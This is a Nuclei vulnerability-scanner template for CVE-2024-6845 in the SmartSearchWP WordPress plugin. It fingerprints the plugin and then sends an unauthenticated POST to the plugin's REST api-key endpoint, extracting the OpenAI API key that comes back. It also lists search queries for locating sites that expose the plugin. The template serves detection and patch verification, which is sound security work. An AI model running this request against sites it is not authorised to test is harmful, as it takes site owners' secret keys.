id: CVE-2024-6845

info:
  name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
  author: s4e-io
  severity: medium
  description: |
    The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
  remediation: Fixed in 2.4.6
  reference:
    - https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6845
  metadata:
    max-request: 2
    verified: true
    vendor: webdigit
    product: smartsearchwp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/smartsearchwp"
    fofa-query: body="/wp-content/plugins/smartsearchwp"
  tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/smartsearchwp")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/wdgpt/v1/api-key HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"key": "U2FsdGVkX1+X"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        name: api-key
        regex:
          - '"([^"]+)"'
# digest: 4b0a0048304602210092fc3bf9edc1308d1cd7e13efa435ba2592ef1844574a598d48fcfa7c6f28340022100ce6056a70232fd730d9a94c2128feb16857c2f1002ee9c7646d5d965e0690ce4:922c64590222798bb761d5b6d8e72950